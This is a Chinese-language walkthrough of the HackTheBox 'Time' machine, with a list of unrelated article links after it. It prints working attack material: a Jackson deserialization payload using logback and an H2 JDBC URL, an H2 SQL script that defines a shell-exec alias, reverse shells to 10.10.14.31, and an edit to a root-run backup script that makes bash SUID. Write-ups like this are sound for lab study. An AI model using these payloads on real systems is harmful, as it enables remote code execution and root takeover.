当前位置：首页 > news >正文

HTB-Time

news 2025/7/12 13:48:46

HTB-Time

信息收集
- 80端口
立足
pericles -> root

请添加图片描述

信息收集

在这里插入图片描述

80端口

在这里插入图片描述
有两个功能，一个是美化JSON数据。

在这里插入图片描述

一个是验证JSON，并且输入{“abc”:“abc”}之类的会出现报错。
在这里插入图片描述

Validation failed: Unhandled Java exception:
com.fasterxml.jackson.core.JsonParseException: Unexpected character
(‘’’ (code 39)): expected a valid value (number, String, array,
object, ‘true’, ‘false’ or ‘null’)

根据报错可知是java jackson的报错。有关java jackson的漏洞非常多。其中有一篇文章提到几个负载。

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:tcp://10.10.14.31:4443/~test"}]

在这里插入图片描述

立足

新建一个文件名为inject1.sql。

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : "";  }
$$;
CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.14.31/443 0>&1')

python开启http.server。然后在验证功能下输入：

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.14.31:8000/inject1.sql'"}]

在这里插入图片描述

pericles -> root

pspy64可以看到有一个timer_backup.sh没几秒种就会运行一次。
在这里插入图片描述
内容如下：

#!/bin/bash
zip -r website.bak.zip /var/www/html && mv website.bak.zip /root/backup.zip

以及/usr/bin/systemctl restart web_backup.service。
在这里插入图片描述
查找web_backup.service并查看内容：

find / -name web_backup.service -type f 2>/dev/null
/etc/systemd/system/web_backup.servicepericles@time:/tmp$ cat /etc/systemd/system/web_backup.service
[Unit]
Description=Creates backups of the website[Service]
ExecStart=/bin/bash /usr/bin/timer_backup.sh

因为隔几秒种会重启web_backup.service，web_backup.service服务又会运行/usr/bin/timer_backup.sh。

还有一个/bin/sh -c /usr/bin/systemctl restart timer_backup.timer，不过我暂时不需要，留在这备用。
在这里插入图片描述
我们能写入timer_backup.sh但是时间任务并没执行我写入的内容，可能还有时间任务先对timer_backup.sh进行重置再运行。顺序是某个东西启动web_backup.service，web_backup.service启动timer_backup.sh。但是我没找到那个东西是什么。所以我决定再尝试对timer_backup.sh追加写入试试。向末尾添加cp /bin/bash /tmp/bash;chmod u+s /tmp/bash后等待片刻后仍无任何成功迹象。写入reshell到/usr/bin/timer_backup.sh里能成功。

 echo -e '\nbash -i >& /dev/tcp/10.10.14.31/4443 0>&1' >> /usr/bin/timer_backup.sh

但是几秒钟后就没了。
在这里插入图片描述
可以用echo “chmod u+s /bin/bash” 修改/bin/bash，但为什么不能复制过来后再修改呢。

我不知道。

HTB-Time

HTB-Time

信息收集

80端口

立足

pericles -> root

相关文章：

HTB-Time

零基础C/C++开发到底要学什么？

OpenStack中的CPU与内存超分详解

main.m文件解析--@autoreleasepool和UIApplicationMain

C语言复习之顺序表（十五）

学系统集成项目管理工程师（中项）系列10_立项管理

电视盒子哪个好？数码小编盘点2023电视盒子排行榜

flink动态表的概念详解

ArcGIS Pro用户界面

HDCTF 2023 Pwn WriteUp

【 Spring 事务】

【刷题之路】LeetCode 203. 移除链表元素

关于Open Shift(OKD) 中用户认证、权限管理、SCC 管理的一些笔记

活动文章测试（勿删）

Windows下批量重命名文件【bat实现】

从 Milvus 2.2 到 2.2.6，我们是如何持续稳定升级的

自学python有推荐的么

设计模式 --- 行为型模式

防御式编程

导出pdf Puppeteer 和 wkhtmltopdf区别

uniapp 对接腾讯云IM群组成员管理（增删改查）

调用支付宝接口响应40004 SYSTEM_ERROR问题排查

MySQL 隔离级别：脏读、幻读及不可重复读的原理与示例

【Linux】C语言执行shell指令

理解 MCP 工作流：使用 Ollama 和 LangChain 构建本地 MCP 客户端

【机器视觉】单目测距——运动结构恢复

电脑插入多块移动硬盘后经常出现卡顿和蓝屏

ServerTrust 并非唯一

leetcodeSQL解题：3564. 季节性销售分析

拉力测试cuda pytorch 把 4070显卡拉满